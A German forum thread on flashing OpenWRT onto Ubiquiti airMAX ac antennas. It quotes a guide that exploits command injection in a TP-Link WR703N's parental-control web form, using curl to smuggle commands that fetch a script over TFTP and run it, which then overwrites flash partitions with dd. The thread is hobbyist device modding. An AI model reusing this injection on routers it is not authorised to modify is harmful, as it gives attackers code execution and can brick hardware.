airMAX ac mit OpenWRT nun möglich


Mit diesem Trick ist es möglich, auch auf aktuellere airMAX ac-Hardware OpenWRT zu flashen: Allgemein, NBE-5AC, LBE-5AC,

Damit kann die Limitierung, dass man sich airMAX ac-Antennen als Station nur an ebensolche hängen können umgangen werden.

Habe noch nicht ausgiebig getestet, wie es um die Performance im Vergleich mit der proprietären Firmware verhält, aber mal schaun.

Interessant wäre es auch ob sich das 2.4GHz Management Wi-Fi bei den Gen2-Antennen sinnvoll nutzen lässt.


2 Like

Das funktioniert aber nur, wenn man openwrt draufflasht? Mit der Originalfirmware wäre cool …

Cool - nur der Vollständigkeit halber hier der post von psyborg55:

few days ago i got Litebeam 5AC 23 Gen2 with WA.v8.5.7.38314.180628.1036, patching ubntbox did not work, downgrading to WA.v8.5.0.36727.180118.1314 was useless as device remained inaccessible.

luckily there is a crack in airos8 upgrade procedure that allows for flash manipulation without opening device:

log in to ssh and start to update same firmware that is already on device (in my case 8.5.7):

fwupdate.real -m /tmp/WA.v8.5.7.38314.180628.1036.bin -d

during the process abort the upgrade (sometime when it reaches checking of mtd3) by pressing Ctrl+C

this way we let the airos upgrade do the hard work for us by unlocking mtd partitions :slight_smile:

after that flash your sysupgrade image to /dev/mtdblock2 and /dev/mtdblock3. it is needed to split sysupgrade image prior to that into chunks that will fit these partitions, see this great article by bugblue on how to do that:

unplug and replug power to device and it boots openwrt

i did waste several hours with this since i was trying factory image at first, then remembered sysupgrade must be used

Und hier der Inhalt vom pastebin Link (falls der Link/paste entfernt werden sollte):

Upgrade WR703N V 1.17.1 to openwrt

1. Upgrade your new WR703N V1.17.1 to openwrt.


2. These are just hints how I did it.

 * If you have no experience with wr703n's. Just buy a MR3020.

 * You'll need:

3. * A FTP server (in my case, I advise to use the same IP or understand what the hell you're doing)

4. * An unix or mac workstation with curl (can be the same box)

5. * A general knowledge of unix commands.

6. * An openwrt image. I make my own but stock 12.09 might work.

7. * A binary busybox for mips static compiled.

 * The general idea:

8. * Put a script on your tp-link wr703n

9. * Put a better busybox on your tp-link wr703n

10. * Trick the wr703n into executing some commands to run this script.

11. The script:

12. * get the first en second part of the image from tftp

13. * flash the first part of the image (1024k) to the mtd partition named kernel

14. * flash the rest of the image (2819k) to the mtd partition named rootfs

15. * reboot the box with openwrt on it.

 * First setup the tftp server and put the following files there:

 * === file aa cut from here ======

16. cd /tmp

17. tftp -gl i1

18. tftp -gl i2

19. tftp -gl busybox

20. chmod 755 busybox

21. ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync

22. ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync

23. ./busybox reboot -f

24. echo blaaat

25. === /file aa cut to here =======

26. Put the rest also there:

27. * busybox

28. * openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

 * Cut the openwrt image in 2 parts. (Yes these commands):

29. These commands can take a while since I had no interrest in calculating a better blocksize.

30. dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576

31. dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576

 * now there are 4 files in your TFTP directory: aa, busybox, i1, i2

 * Now let's take a router and have it set to the factory settings.

 * Run these commands on you're workstation.

32. # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!

33. # First it wants a password set, let's do that. (the password is admin42 after this).

34. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' ''

35. # Secondly it wants to have parental control enabled (probably the once in a lifetime opportunity to use this).

36. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer '' ''

37. # That being done, now all we need is to just simply exploit the router.

38. # readable it does:

39. # cd /tmp ; tftp -gl aa; sh aa

40. # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

41. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer '' ';cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'

42. # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).

 * Just wait until it starts to blink, than openwrt is loading. Depending on your image you can reach it on it's mac address.

 * If you have no experience with wr703n's. Just buy a MR3020.